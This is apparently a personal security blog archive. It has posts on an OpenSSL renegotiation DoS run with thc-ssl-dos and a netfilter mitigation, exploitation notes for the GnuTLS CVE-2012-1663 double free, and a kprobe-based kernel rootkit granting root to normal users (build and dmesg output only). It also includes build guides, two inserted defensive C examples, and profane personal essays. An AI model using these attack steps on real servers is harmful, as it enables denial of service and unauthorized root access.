Thursday, March 28, 2013

Openssl renegotiation DoS attack is still an issue

That Openssl renegotiation can cause a DoS was disclosed in 2011, then THC released their DoS attack tool. This issue, which we call CVE-2011-1473, still has no solution from the openssl upstream community until now. So, it seems they've been leaving this issue to the application developers (suck this shit in mind); Apache2, for example, provides an optional config with which you can disable renegotiation.

Let's see what an Apache2 server would do in most cases:

shawn@fortress / $ openssl s_client -connect build.opensuse.org:443

..............................

..............................

Timeout   : 300 (sec)  

Verify return code: 20 (unable to get local issuer certificate) ---

R   // Press R, then enter

RENEGOTIATING 140722018514592:error:1409E0E5:SSL routines:SSL3_WRITE_BYTES:ssl handshake failure:s3_pkt.c:592:


According to Vincent Bernat, a server will require 15 times the processing power of the client, which means an Intel i7 CPU laptop can kick a bunch of servers' asses. Plz take a look at my test data:

Test environment: SLES 11 SP2, assigned 2 cores + 1GB memory in a virtual machine

Case I:

Server: openssl s_server -key server-key.pem

Client: thc-ssl-dos 192.168.0.1 4433 --accept -l 10000

The worst case:

Cpu0 : 1.3%us, 1.7%sy, 0.0%ni, 97.0%id, 0.0%wa, 0.0%hi, 0.0%si, 0.0%st

Cpu1 : 53.1%us, 5.1%sy, 0.0%ni, 37.1%id, 0.0%wa, 0.0%hi, 0.7%si, 0.0%st

Case II: Vincent Bernat provided us an open source hardening/mitigation solution, which adds rate limiting plus filtering on fixed hex data in netfilter.

#sh iptables.sh

#iptables -A INPUT -d 192.168.0.1 -p tcp --dport 4433 -j LIMIT_RENEGOCIATION

Server: openssl s_server -key server-key.pem

Client: thc-ssl-dos 192.168.0.1 4433 --accept -l 10000

The worst case:

Cpu0 : 0.0%us, 0.0%sy, 0.0%ni,100.0%id, 0.0%wa, 0.0%hi, 0.0%si, 0.0%st

Cpu1 : 0.0%us, 0.7%sy, 0.0%ni, 99.3%id, 0.0%wa, 0.0%hi, 0.0%si, 0.0%st

Well done, Vincent! Your solution works. But I'm not sure whether this may cause side-effects. Vincent added some fixed hex data as a filtering policy on netfilter. What if the same hex data occurs in legitimate traffic? Are false positives possible?

Wednesday, March 20, 2013

possible ways to exploit CVE-2012-1663

CVE-2012-1663 is a possible remote DoS attack issue. This issue has been fixed in GNUTLS >= 3.0.14. I hacked on it for hours and figured out a few prerequisites that could make it vulnerable:

=============================
REQUIRED:

 - GnuTLS prior to 3.0.14
 - a crafted certificate

=============================
Attack scenarios

 - a client imports a crafted cert file and uses it for requests to a server (CA?)

 - a "server" imports a crafted cert file and uses it for requests to another
   server (CA?)

---> repeat the above at high frequency

From the client side, the attacker should try to construct a crafted certificate that makes the call below fail:

ret = gnutls_pubkey_import_x509(pcert->pubkey, crt, 0);
if (ret < 0)
  {
    gnutls_pubkey_deinit(pcert->pubkey);
    /* pcert->pubkey should be NULL now */
    ret = gnutls_assert_val(ret);
    goto cleanup;
  }

I made two crafted cert files (client.pem, client2.pem) that seem to trigger the double free on the client side.

Warning: don't try it on your host machine, because it eats a lot of memory and makes the machine very slow. I highly recommend using a VM for testing.

shawn@sl13:~/gnutls_compile_uses/CVE-2012-1663$ ./ex-serv-x509
processing server set to null?
Server ready. Listening to port '5556'.

shawn@sl13:~/gnutls_compile_uses/CVE-2012-1663$ ./attack.sh
................
.................
...................

Another terminal: killall client

Test platform: Slackware 13.37 + GNUTLS-3.0.13

Monday, March 11, 2013

How to compile GNUTLS-3.1.9 on Slackware 13.37

Before you dive into the detailed source code of GnuTLS, you'd better compile/install it manually. But you know, hackers are one of the laziest types of people in the world. We want everything automated. We did functional testing in the first place, then we wanted to transform that boring shit into automated testing. Even in the security field, a bunch of guys (not the lamers ;-)) are trying to automate the pentest/exploit shit. I used to be an open source security QA guy and tried some automation tools (like ctcs) to satisfy my "lazy" requirement. Then I started maintaining some security packages and fixing/backporting CVE issues for "some" GNU/Linux distro. I've been doing this type of work for months but hadn't compiled the packages I'm maintaining. What a shame ;-)

I wrote a simple script today; it will help if you want to compile GnuTLS manually:

./get_repos.sh
Usage: [ Compile packages automatically: yes/no]

Type:
./get_repos.sh no  ===> only download the packages, without compiling
./get_repos.sh yes ===> download the packages, then compile

If you choose "yes", you can check that it really works:
Open two terminals: T1, T2

T1: run the anonymous server with TLS
john@sl13:~/gnutls_uses$ ./anonymous_serv
Server ready. Listening to port '5556'.

- connection from 127.0.0.1, port 59923
- Handshake was completed

- Peer has closed the GnuTLS connection

T2: Run the client
john@sl13:~/gnutls_uses$ ./anonymous_cli
- Handshake was completed
- Received 18 bytes: GET / HTTP/1.0

That's it! Have fun with it!

May L0rd's hacking spirit guide us!!!

Monday, January 21, 2013

Security shit in QA work

I wrote an introduction-level article about how QA could possibly hack into the security field. You can download it here. There are two reasons I wrote it. Firstly, I want to dedicate it to Aaron Swartz, who was a great hacker. Secondly, I've done some security QA stuff and I want to share some of the shit I hacked on with you guys.

May L0rd's hacking spirit guide us!

Thursday, November 22, 2012

Simple GNU/Linux kernel rootkit?

It's been fucking busy at the day job recently. But I still couldn't forget the most important thing: the night job. Hacking on security stuff is much more fun than other technical fields. Endless functional testing really fucked my mind. I need fresh air and a deep breath... PM 2.5 is fucking high in Beijing, shit. Why should I be here? I really want to go back to my hometown if I can work from home. Wait a minute, where is my fucking home? Switchfoot told us that we do not belong here -_-

Hmm... I bullshitted a lot again. Let's talk about this example program. It's a simple rootkit for the GNU/Linux kernel, implemented with the kprobe mechanism the kernel itself provides. kprobes are very powerful; they were designed for kernel debugging, but we can use them for our own purposes. You know, as a security guy, getting your hands dirty in kernel land is just a matter of time. This rootkit lets normal users do root's business.

--------------------------------------------------------------------
Show time:
root@sl13:/home/john/dumb_rootkit# make
make -C /lib/modules/2.6.39-smp/build/ M=/home/john/dumb_rootkit modules
make[1]: Entering directory `/usr/src/linux-2.6.39'
  CC [M]  /home/john/dumb_rootkit/dumb_rootkit.o
  Building modules, stage 2.
  MODPOST 1 modules
  CC      /home/john/dumb_rootkit/dumb_rootkit.mod.o
  LD [M]  /home/john/dumb_rootkit/dumb_rootkit.ko
make[1]: Leaving directory `/usr/src/linux-2.6.39'
root@sl13:/home/john/dumb_rootkit# insmod dumb_rootkit.ko 
root@sl13:/home/john/dumb_rootkit# exit
exit
john@sl13:~/dumb_rootkit$ /usr/sbin/iptables -L
Chain INPUT (policy ACCEPT)
target     prot opt source               destination         

Chain FORWARD (policy ACCEPT)
target     prot opt source               destination         

Chain OUTPUT (policy ACCEPT)
target     prot opt source               destination         
john@sl13:~/dumb_rootkit$ dmesg -c
[ 5700.687828] Planted jprobe at c10ffb20, handler addr d8e32000
[ 5707.502249] jprobe: filename: /usr/bin/id from bash, pid = 6393, uid = 0, gid = 0
[ 5728.728063] jprobe: filename: /usr/sbin/iptables from bash, pid = 6394, uid = 0, gid = 0
[ 5730.936214] jprobe: filename: /bin/dmesg from bash, pid = 6395, uid = 0, gid = 0
--------------------------------------------------------------------

What the fuck was going on? No more explanation, please RTFSC.....
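A check a defender would want here, as an added example that is not part of dumb_rootkit: the kernel lists every registered probe in /sys/kernel/debug/kprobes/list, and a probe sitting on the execve path or on the credential helpers is a strong signal. The watchlist below is our own choice, the listing is constructed, and the symbol behind c10ffb20 is an assumption (the dmesg output above only shows a jprobe planted at that address).

```c
/* Added example, not part of the rootkit: a checker for the probe list
 * the kernel exports at /sys/kernel/debug/kprobes/list. Each line there
 * reads "<address>  <type>  <symbol>+<offset>  [<module>] [flags]", with
 * type k (kprobe), r (kretprobe) or, on 2.6.39-era kernels, j (jprobe).
 * The watchlist is our choice, not a kernel interface, and the sample
 * listing is constructed: the symbol behind address c10ffb20 is an
 * assumption, the dmesg output above only shows a jprobe planted there. */
#include <stdio.h>
#include <string.h>

/* Symbols a probe has no business sitting on in production: the execve
 * path and the credential helpers a privilege-granting hook would use. */
static const char *watchlist[] = {
    "do_execve", "sys_execve", "do_execve_common",
    "prepare_creds", "commit_creds", "sys_setuid",
    NULL
};

/* Parse one kprobes/list line into its type letter and bare symbol name.
 * Returns 1 on success, 0 if the line does not have the expected shape. */
int parse_kprobe_line(const char *line, char *type, char *sym, size_t symlen)
{
    char addr[32], symoff[128];
    if (sscanf(line, "%31s %c %127s", addr, type, symoff) != 3)
        return 0;
    char *plus = strchr(symoff, '+');
    if (plus) *plus = '\0';              /* drop the +0x<offset> suffix */
    strncpy(sym, symoff, symlen - 1);
    sym[symlen - 1] = '\0';
    return 1;
}

/* Returns 1 if the symbol is on the watchlist. */
int is_watched(const char *sym)
{
    for (const char **w = watchlist; *w; w++)
        if (strcmp(sym, *w) == 0) return 1;
    return 0;
}

/* Count probes on watchlisted symbols in a whole listing (one probe per
 * line, as the debugfs file presents it). */
int count_suspicious_probes(const char *listing)
{
    int hits = 0;
    const char *p = listing;
    while (*p) {
        const char *nl = strchr(p, '\n');
        size_t n = nl ? (size_t)(nl - p) : strlen(p);
        char line[256], type, sym[128];
        if (n >= sizeof line) n = sizeof line - 1;
        memcpy(line, p, n);
        line[n] = '\0';
        if (parse_kprobe_line(line, &type, sym, sizeof sym) && is_watched(sym))
            hits++;
        if (!nl) break;
        p = nl + 1;
    }
    return hits;
}

/* Constructed listing: one jprobe on do_execve plus two benign probes. */
static const char sample_listing[] =
    "c10ffb20  j  do_execve+0x0   \n"
    "c1050a40  k  sys_open+0x0   \n"
    "d8e31000  r  tcp_v4_connect+0x0  [FTRACE]\n";

int sample_hits(void) { return count_suspicious_probes(sample_listing); }

/* Stand-alone use: needs root and a mounted debugfs. */
int main(void)
{
    FILE *f = fopen("/sys/kernel/debug/kprobes/list", "r");
    if (!f) { perror("kprobes/list"); return 1; }
    char line[256], type, sym[128];
    int hits = 0;
    while (fgets(line, sizeof line, f))
        if (parse_kprobe_line(line, &type, sym, sizeof sym) && is_watched(sym)) {
            printf("probe of type %c on %s\n", type, sym);
            hits++;
        }
    fclose(f);
    return hits ? 2 : 0;
}
```

Run it as root with debugfs mounted. The list is only as honest as the kernel producing it: a module that also tampers with debugfs, or unregisters its probe before you look, will not appear, so treat a clean list as absence of evidence and compare it with /proc/modules and the "Planted jprobe" messages in dmesg as well.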

Today is Thanksgiving Day. I'm celebrating this holiday but I'm not a Yankee. I'm a Christian but I'm not very religious. I've gotten used to calling myself a "neo-Calvinist technological Christian". It's quite a long name, isn't it? The point is that the name isn't important anymore. In cyberspace (the internet?), it doesn't fucking matter who you are or how rich you are. We (hackers?) don't even care about your sexy ass. The idea is the only thing that matters!

Thank God, Phrack is still running... and never better!

May L0rd's hacking spirit guide us!!!

btw: I was drinking PAULANER while writing this shit -_-

Sunday, October 21, 2012

My story - The falling of Hackerfellowship Group

Where should I begin? The story I'm going to share is definitely a long one. I'll make it as short as I can.

I became a Christian in 2004. In the following years I read/learned a lot about other people's consequences of ideas. In late 2007, after 3 years of thinking, I thought I was still lacking "aha" ideas. There were more face-to-face conversations back then. I sponsored a community to get a group of people together to discuss some topics. HFG (Hackerfellowship Group) was born in 2007. We had monthly meetings for 5 years. We also had a lot of discussions on the mailing list. People came and went. A lot of things happened. I tried to build HFG as an organic community but I totally failed. I neglected the most important factor in an organic community: people must already have an organic life, a hacker's life. I expected HFG to have the spirit of an underground community but it never did, because the guys I was hacking with were not hackers and didn't even understand what the hacker ethic is. Nalaginrut/fU9ANg/口水猫/.... you are not fucking hackers! How can people get used to talking about the hacker ethic without any experience of underground scenes? Indeed, I was inspired by Phrack. That's why I ended HFG in my life journey. I'm becoming more of a security guy and less of a generic hacker. I shut down the mailing list and set it open to the public. Someday in the future, will I be back? I don't know. Anything is possible if I really want it.

Don't get me wrong. Some former HFG members are still my good friends. Unfortunately, only friends, without the brotherhood tag. I built my own fundamental structure of philosophy from the experiences in HFG. Unfortunately again, it was only my philosophy, and it always will be. I finally decided to release the latest version of the HFG manifesto on my blog last month. I hope it can help people who are struggling with this sort of philosophical idea. But I'm not sure if it really can be helpful. I just do what I should do. I know people would like to hear a happy ending. I'm so sorry, did I fuck your mind again? You fuc*ing tell me...

btw: The internet is an incredible system. No one gives a shit about who you are or what you believe on the internet. What the internet cares about is only ideas. V is right that ideas are immortal. No one can destroy ideas.
-----------------------------------------------------------------------------------------------------
HFG (Hackerfellowship Group) manifesto, alpha-end revised version

What is Fellowship?
In ancient Greece, a fellowship meant a group of guys hacking together to achieve the same goal. The HackerFellowship gets hackers together for conversation/sharing/hacking. Hackers always live in the future, and define the future!


What is our goal?
Hacking, find the truth! Because hackers want/need truth. Hackers must experience some kind of underground scene. We are trying to build an underground online/offline community to help us dig deeper, behind the surface. Hacking on the 4-layer model of Theo/Philo/Math/Engi with the inevitable complexity of this world...


I want to join, but how?
Wait a minute, my dear friend. We wish you could be one of us, just like a brother (maybe you are a sister) returning home. We all know that choosing the strong philosophy is our only option. In the whole ecosystem (Sunday school -> brotherhood -> community -> start-up -> company -> multi-regional corporation), building a brotherhood is our target. Once you get in, you must share some views/knowledge. Keep that in mind: what we really care about is your own philosophy, and we need you to prove that you have the abilities or background below to contribute:

1, Join a conversation like a philosopher who lived in ancient Greece.

2, If you come from the computer field, you should have basic programming skills in either C (think the Turing machine way) or Scheme (think the lambda calculus way), and the ability to build your own personal world view of the computing field.

3, If you are an atheist, we only accept real atheists (like Ray Kurzweil?) who are looking for the truth whatever it costs. If you are not that type, fuck outta here.

4, If you are a Christian, only the Reformed faith (Lutheranism, Calvinism, neo-Calvinism, etc.) is welcome in HFG! Because we need a Christian who is willing to dedicate himself/herself to the cultural mandate (as defined by Reformed theology) in his/her hacking field.


Why HFG?
There may be dozens of reasons. We only list some highlights:

1, We are the type of people who follow the hacker ethic and focus on the purpose of life. Even if we don't know the purpose or our position in this specific era, we are still trying to figure it out.

2, The brotherhood is like the Second Foundation, which never existed. Wait... where the hell is the First Foundation? Do you get it? Joining HFG means you have a chance to learn/hack on how to build an underground brotherhood.

3, Not all of us come from computer fields. A lot of people do really good work in non-computer fields; we call them generic hackers. The hacker ethic now affects more places than we thought. We are hackers! We are anonymous! We have different hacking backgrounds. But we share the same methodologies.

We suggest you take these courses on MIT OCW:
1, Structure and Interpretation of Computer Programs
2, Introduction to Computer Science and Programming (python)
3, Operating System Engineering
4, Computer Language Engineering
5, Practical Programming in C
6, Multicore Programming Primer

Technical topics:
1, Lisp interpreter
2, GNU/Linux
3, Open hardware


Some materials from our friendly arsenal:

------------------------------------------------------------------------------------------
The Holy Bible - SOMEONE
------------------------------------------------------------------------------------------

Hacker, Hacker, Hacker!!!
------------------------------------------------------------------------------------------
The Hacker Ethic and the Spirit of the Information Age by Pekka Himanen
Hackers: Heroes of the Computer Revolution by Steven Levy
Masters of Doom: How Two Guys Created an Empire and Transformed Pop Culture - David Kushner
Hackers and Painters: Big Ideas from the Computer Age by Paul Graham
The Art of Intrusion - Kevin Mitnick
------------------------------------------------------------------------------------------

Ideas - Theological philosphy & Philosophical theology
------------------------------------------------------------------------------------------
Institutes of the Christian Religion - John Calvin
Redeeming Science - Vern Sheridan Poythress
The Silmarillion - J. R. R. Tolkien
The Lord of the Rings trilogy - J. R. R. Tolkien
The Protestant Ethic and the Spirit of Capitalism - Max Weber
The Consequences of Ideas: Understanding the Concepts that Shaped Our World - R. C. Sproul
Making Sense of It All Pascal and the Meaning of Life - Thomas V. Morris
Worldview: The History of a Concept - David K. Naugle
Confessions - St. Augustine
The Great Philosophers - Karl Theodor Jaspers
Truth or Consequences: The Promise & Perils of Postmodernism - Millard J. Erickson
Twilight of the Idols - Friedrich Nietzsche
The Will to Power - Friedrich Nietzsche
Philosophical Fragments - Soren Aabye Kierkegaard
Interview with the Vampire - Anne Rice
The Vampire Lestat - Anne Rice
My Life: A Spoken Autobiography - Fidel Castro
Man, his nature and place in the world - Arnold Gehlen
Wild at heart - John Eldredge
Mathematics in Western Culture - Morris Kline
Metaphysics  - Aristotle
Nine Talmudic Readings  - Emmanuel Levinas
Mere Christianity - C. S. Lewis
On the Trinity - St. Augustine
Thoughts - Blaise Pascal
A History of Western Philosophy - Bertrand Russell
On Judaism - Martin Buber
Shadows of the Mind: A Search for the Missing Science of Consciousness - Roger Penrose
God in Search of Man: A Philosophy of Judaism - Abraham Joshua Heschel
Essence of Judaism - Leo Baeck
Everyman's Talmud - Abraham Cohen
The Matrix and Philosophy: Welcome to the Desert of the Real - William Irwin
Start-up Nation: The Story of Israel's Economic Miracle - Saul Singer
Out of Control: The New Biology of Machines, Social Systems, and the Economic World - Kevin Kelly
What Technology Wants - Kevin Kelly
When Science Meets Religion: Enemies, Strangers, or Partners? - Ian G. Barbour
Foundation Series by Isaac Asimov
English Deism: Its Roots And Its Fruits - John Orr
The Singularity is near - Ray Kurzweil
Complexity: The Emerging Science at the Edge of Order and Chaos - M. Mitchell Waldrop
Hidden Order: How Adaptation Builds Complexity - John Holland
The Quark and the Jaguar: Adventures in the Simple and the Complex - Murray Gell-Mann
------------------------------------------------------------------------------------------

Chinese version (translated to English)

What is Fellowship?
In ancient Greece, Fellowship meant a group of people with the same purpose getting together to work hard on something. HFG is such a place. Hackers always live in the future and are the creators of the future!


Our goal?
Hacking, finding the truth in every field! Because hackers' hearts crave the truth. The underground scene is an experience every hacker must have. We are trying to build an underground online and offline community to help us dig better for the truth beneath the surface. Hacking the whole four-layer model (theology/philosophy/mathematics/engineering) inevitably runs into the complexity of the world.


Requirements for joining HFG:
Please think seriously about your motivation for joining HFG. HFG is like a brotherhood (note: a brotherhood is not a stagnant "soy-sauce vat"). You must share your ideas, because that is how more "aha" moments are struck. Besides a sharing attitude, you must also meet the following conditions:

1, Join the discussion with an open attitude; we care about your philosophy, not hearsay knowledge.

2, If you come from the computer field, you must at least have programming experience: a C foundation (the Turing machine route) or a Scheme foundation (the lambda calculus route), and the ability to build a world view of computer science.

3, If you are an atheist, we only accept genuine atheists, because they will pay any price to seek the truth. If you are an atheist in the popular sense, get out right now!

4, If you are a Christian, only the Reformed faith (Lutheran, Calvinist, etc.) is accepted by HFG, because they are willing to devote themselves to the cultural mandate in every field.


Why join HFG?
There may be many reasons, but here we list only the most important ones:

1, We are a group of people seeking the meaning of life and following the hacker ethic. Even if we have not yet figured out the meaning of our existence or our position against the background of this era, that's fine; we will figure it out.

2, The brotherhood, like the Second Foundation, has never existed... wait, then where is the First Foundation? Do you understand the metaphor? Joining HFG at least means you can learn from and take part in building an underground brotherhood.

3, Not everyone comes from the computer field. Many people do excellent work in non-computer fields; we simply call them Generic Hackers. The influence of the hacker ethic goes far beyond our imagination. We are hackers! We are anonymous! We have different hacking experiences and backgrounds. But we share the same methodology.


MIT OCW courses recommended by HFG:
1, Structure and Interpretation of Computer Programs
2, Introduction to Computer Science and Programming (python)
3, Operating System Engineering
4, Computer Language Engineering
5, Practical Programming in C
6, Multicore Programming Primer


Technical topics in the computer field:
1, Lisp interpreter
2, GNU/Linux
3, Open hardware


Reference reading: the same list as in the English version above.

Thursday, July 26, 2012

How to compile the glibc-2.14.1 on Slackware 13.37

Note: This article is not about building a cross-compiler toolchain. The only reason I need to rebuild glibc is to hack on glibc itself, which means providing a debugging platform. If you need to build a cross-compiler toolchain (for the PlayStation 3?), go to the OpenWrt community.

1, Download glibc-2.14.1.

2, Preparation before compiling:

root@sl13:/home/libs/2.14-build# mkdir -p /home/root_shawn/etc
root@sl13:/home/libs/2.14-build# cp /etc/ld.so.conf /home/root_shawn/etc/

3, Decompress the source code and compile (out of tree, from the 2.14-build directory):

root@sl13:/home/libs# tar jxvf glibc-2.14.1.tar.bz2
root@sl13:/home/libs/2.14-build# ../glibc-2.14.1/configure --prefix=/home/root_shawn --with-tls --enable-add-ons=nptl
root@sl13:/home/libs/2.14-build# make -j 2 && make install

4, Edit some config files:

add "export LIBRARY_PATH=/home/root_shawn/lib:/lib:/usr/lib" to the file /etc/profile

edit the file "/usr/lib/gcc/i486-slackware-linux/4.5.2/specs", and replace "/lib/ld-linux.so.2" with "/home/root_shawn/lib/ld-linux.so.2"

add "/home/root_shawn/lib" to the file /etc/ld.so.conf, before /lib and /usr/lib: the dynamic loader and libc.so.6 must come from the same glibc build, otherwise programs fail at startup with unresolved GLIBC_PRIVATE symbols

root@sl13:/home/libs/2.14-build# ldconfig
root@sl13:/home/libs/2.14-build# source /etc/profile

5, Test the current version of glibc

hello.c:
------------------------------------------------
#include <stdio.h>
#include <gnu/libc-version.h>
int main ()
{
        printf("%s\n", gnu_get_libc_version ());
        return 0;
}


root@sl13:~# gcc hello.c
root@sl13:~# ./a.out
2.14.1

Bingo, it's already upgraded!

6, Check the linking path

root@sl13:~# readelf -l a.out

Elf file type is EXEC (Executable file)
Entry point 0x8048340
There are 7 program headers, starting at offset 52

Program Headers:
  Type           Offset   VirtAddr   PhysAddr   FileSiz MemSiz  Flg Align
  PHDR           0x000034 0x08048034 0x08048034 0x000e0 0x000e0 R E 0x4
  INTERP         0x000114 0x08048114 0x08048114 0x00023 0x00023 R   0x1
      [Requesting program interpreter: /home/root_shawn/lib/ld-linux.so.2]
  LOAD           0x000000 0x08048000 0x08048000 0x00504 0x00504 R E 0x1000
  LOAD           0x000504 0x08049504 0x08049504 0x00104 0x0010c RW  0x1000
  DYNAMIC        0x000518 0x08049518 0x08049518 0x000c8 0x000c8 RW  0x4
  NOTE           0x000138 0x08048138 0x08048138 0x00020 0x00020 R   0x4
  GNU_STACK      0x000000 0x00000000 0x00000000 0x00000 0x00000 RW  0x4

 Section to Segment mapping:
  Segment Sections...
   00   
   01     .interp
   02     .interp .note.ABI-tag .hash .dynsym .dynstr .gnu.version .gnu.version_r .rel.dyn .rel.plt .init .plt .text .fini .rodata .eh_frame
   03     .ctors .dtors .jcr .dynamic .got .got.plt .data .bss
   04     .dynamic
   05     .note.ABI-tag
   06   

[Requesting program interpreter: /home/root_shawn/lib/ld-linux.so.2] --- that's what I want. Shit~ I can debug the fucking glibc now. I'll keep reading the Phrack paper (avoiding the stack canary for remote exploitation, for fun and profit?) this week. 29% is too far away from my goal/gold..... hmm... maybe emacs's line counter has some problem @_@

btw: The Architect wants the Matrix to run by the paradigms of closed system/linear/mechanical/engineering/controlled. The Oracle wants the Matrix to become a diverse world with infinite possibility, following the paradigms of open system/non-linear/biological/evolving/out of control. What matters depends on your "choice".
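readelf answers the question by hand; the added C below (not from this post) extracts PT_INTERP programmatically, which is handy when a build or audit script has to verify that every binary in a tree requests the loader from the right glibc. It handles ELF32 and ELF64 little-endian images on a little-endian host; sample_image() builds a minimal, constructed ELF64 whose interpreter is the path from this post.

```c
/* Added example, not part of the original post: extract PT_INTERP from
 * an ELF image the way readelf -l reports it, so the requested loader can
 * be checked from a script after a build like the one above. Handles
 * ELF32 and ELF64, little-endian images on a little-endian host only.
 * sample_image() builds a minimal in-memory ELF64 that is constructed
 * for this demonstration. */
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Copy the interpreter path of the ELF in buf into out (NUL-terminated).
 * Returns its length, 0 when there is no PT_INTERP (a static binary),
 * or -1 when buf is not a sane little-endian ELF. */
int elf_interp(const uint8_t *buf, size_t len, char *out, size_t outlen)
{
    if (len < 52 || memcmp(buf, "\x7f" "ELF", 4) != 0 || buf[5] != 1)
        return -1;
    int is64 = buf[4] == 2;
    if (is64 && len < 64) return -1;

    uint64_t phoff; uint16_t phentsize, phnum;
    if (is64) {
        memcpy(&phoff, buf + 0x20, 8);
        memcpy(&phentsize, buf + 0x36, 2);
        memcpy(&phnum, buf + 0x38, 2);
    } else {
        uint32_t off32;
        memcpy(&off32, buf + 0x1c, 4); phoff = off32;
        memcpy(&phentsize, buf + 0x2a, 2);
        memcpy(&phnum, buf + 0x2c, 2);
    }
    if (phoff > len || phentsize < (is64 ? 56 : 32)) return -1;

    for (uint16_t i = 0; i < phnum; i++) {
        uint64_t ph = phoff + (uint64_t)i * phentsize;
        if (ph + phentsize > len) return -1;       /* table runs past the image */
        uint32_t type; memcpy(&type, buf + ph, 4);
        if (type != 3) continue;                   /* 3 == PT_INTERP */
        uint64_t off, sz;
        if (is64) {
            memcpy(&off, buf + ph + 8, 8);         /* p_offset */
            memcpy(&sz,  buf + ph + 32, 8);        /* p_filesz */
        } else {
            uint32_t o, s;
            memcpy(&o, buf + ph + 4, 4); off = o;
            memcpy(&s, buf + ph + 16, 4); sz = s;
        }
        if (sz == 0 || off > len || sz > len - off || sz > outlen) return -1;
        memcpy(out, buf + off, sz);
        out[sz - 1] = '\0';                        /* p_filesz includes the NUL */
        return (int)strlen(out);
    }
    return 0;
}

/* Build a minimal ELF64 containing only a PT_INTERP entry that points at
 * the loader path from the post. Returns the image size, 0 if len is
 * too small. */
size_t sample_image(uint8_t *buf, size_t len)
{
    static const char interp[] = "/home/root_shawn/lib/ld-linux.so.2";
    const uint64_t phoff = 64, stroff = 64 + 56, strsz = sizeof interp;
    const uint16_t phentsize = 56, phnum = 1;
    const uint32_t ptype = 3;
    if (len < stroff + strsz) return 0;
    memset(buf, 0, stroff + strsz);
    memcpy(buf, "\x7f" "ELF", 4);
    buf[4] = 2; buf[5] = 1; buf[6] = 1;            /* ELFCLASS64, LSB, EV_CURRENT */
    memcpy(buf + 0x20, &phoff, 8);
    memcpy(buf + 0x36, &phentsize, 2);
    memcpy(buf + 0x38, &phnum, 2);
    memcpy(buf + phoff, &ptype, 4);
    memcpy(buf + phoff + 8, &stroff, 8);
    memcpy(buf + phoff + 32, &strsz, 8);
    memcpy(buf + stroff, interp, strsz);
    return stroff + strsz;
}

/* Stand-alone use: ./a.out /path/to/binary */
int main(int argc, char **argv)
{
    static uint8_t img[1 << 20];
    char path[256];
    FILE *f = argc > 1 ? fopen(argv[1], "rb") : NULL;
    if (!f) { fprintf(stderr, "usage: %s <elf>\n", argv[0]); return 1; }
    size_t n = fread(img, 1, sizeof img, f);
    fclose(f);
    int r = elf_interp(img, n, path, sizeof path);
    if (r < 0) { fprintf(stderr, "not a supported ELF\n"); return 1; }
    printf("%s\n", r ? path : "(no PT_INTERP: static binary)");
    return 0;
}
```

Every offset is bounds-checked against the image length before it is dereferenced, which matters when the tool runs over untrusted binaries: a hostile program-header table is exactly the kind of input a parser like this meets in the field.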

Sunday, July 22, 2012

Great minds think alike

I came to BJ on May 8th 2012 and went to a hostel as my temporary home. I was very busy with job interviews in the first week. The result was not really good. Some very famous companies in the industry are not as pretty as I thought. Almost all of them care about hiring cheap labor but nothing about the true hacking spirit. It's ok. I will not disclose you motherfuckers here -_- I began to visit friends/communities in the second week. There was so much interesting stuff I experienced in the next 2 months. Of course, I'm going to share the disclosable part.

Firstly, I started the io-wargame, a learning platform where you can learn and practice your security skills on GNU/Linux. In the first 10 days, I got used to playing io-wargame in the daytime. When I passed lvl5, it became a little bit harder, so I needed help from IRC and had to follow the experienced hackers' daily online schedule. Midnight (in BJ) is a good start for them, so I changed my hacking time. Finally, I spent 1 month passing lvl10. I will keep at it if I have time in the future. If you ask me for a password (please go ask in the IRC channel), I will give you my middle finger. Spoilers are intolerable in the smashthestack community.

I went to Open Party Beijing in May. A bunch of speakers gave us a wide range of topics in the seminar, including history, math, startup ideas and other stuff. After the seminar, I went to dinner with one of the "other stuff" speakers. His name is Philip McMaster. He was a speaker at TEDx Beijing 2011. We discussed a few very serious issues that normal people don't seem to care about. How are the banksters robbing people's wealth? How is the Protestant ethic evolving into the hacker ethic against the background of the information age? How can normal people find their real needs (correct values) today? How can a young man/woman spend a whole afternoon shopping for stuff they never really need? How can you say looking for the truth/purpose of your life is important and still be willing to spend more than 10 years' salary on an apartment? Aha, our society is fucking sick. After I introduced the relationship between the hacker ethic and the information age, Philip started using my terminology to keep the conversation going. Well, I just want to say, as an old man, he has an open mind and he definitely is a fucking hacker.

I went to BLUG's meeting in June. Jose gave a free talk about an open hardware project: open-drone. It's very much like a quadcopter. I was picturing in my mind (while Jose was talking) adding a camera and a wifi device to the drone. It could fly close to a high-rise building and take photos, or fly around your home and crack every wifi network it finds. And I met a female security hobbyist who uses BT5, which is the main OS on my laptop. Her name is Kendra. She is a web designer and an artist hacker. It was my honor to meet the Lady Back-Track -_-

Another interesting experience was hanging out with a friend. He worked for Qi-hardware. He has been very busy mining bitcoins and looking for better ways to do it. Bitcoin is the creation of people who hold anarchist-like philosophical ideas. I like the concept of decentralization. Bitcoin is electronic cash that you can exchange with others peer-to-peer. How do you get bitcoins? You can ask Google about it. My answer is simple: machine computation. At the beginning of bitcoin mining, hackers/people were using CPUs. Then they figured out some technical reasons that make CPUs inefficient for mining work. Using a GPU instead of a CPU is a better choice. The problem now is that GPUs cost too much power, and FPGAs are the way that can fit their needs. See my list below and you will understand:

1000USD's PC with CPU mining: 5Mhash/s
1000USD's PC with GPU mining: 300--400Mhash/s, GPU-part: 100-200W
500USD's FPGA device: 400Mhash/s, only 20-30W

Do the math -_- Qi-hardware shared everything about their experience. If you are interested in being a miner of the information-age variety, hack it for yourself! I went out with friends/backpackers to watch the football match at 11:00 PM. We saw lights on in a few high-rise buildings when we walked back along the street at 4:20 AM. A guy told us a story: "If you can still see lights in the office building after midnight, it means the monkey coders are doing OT there. They actually don't work. They just sit on their butts until the manager goes off to get the bitches. They watch Japanese porn movies and begin masturbating... you know the monkey coder's dick is so small that they can't even find their dick very precisely. The question is why their dick is so small? Because they don't write low-level code, which could be healthy for a programmer's soul." Well, this is a fascinating story from the underground. Please, keep the secret for me and don't tell it to others -_- I think that is what differs between a hacker and a monkey coder. I need to transform myself from monkey coder to hacker. It would be a kind of paradigm shift, a big one!

I got my new job. It's my honor to work for a community-based company. I'll be busting my ass on new hacking in the future. I've already shared the disclosable part of my experience of the past 2 months above. I think these 2 months were my vacation from the 7-year hacking of the Theo/Philo/Math/Engi model. Praise the L0rd!

May L0rd's hacking spirit guide us!

btw: Neo didn't kill Agent Smith. He just decompiled him and split the code into the fucking random area. That's the point!

before I left home:


Lady Back-Track:
 

Backpackers left their photos on the wall:


LongQuan Buddhism temple in BJ:
 

what a delicious food made by friends
 
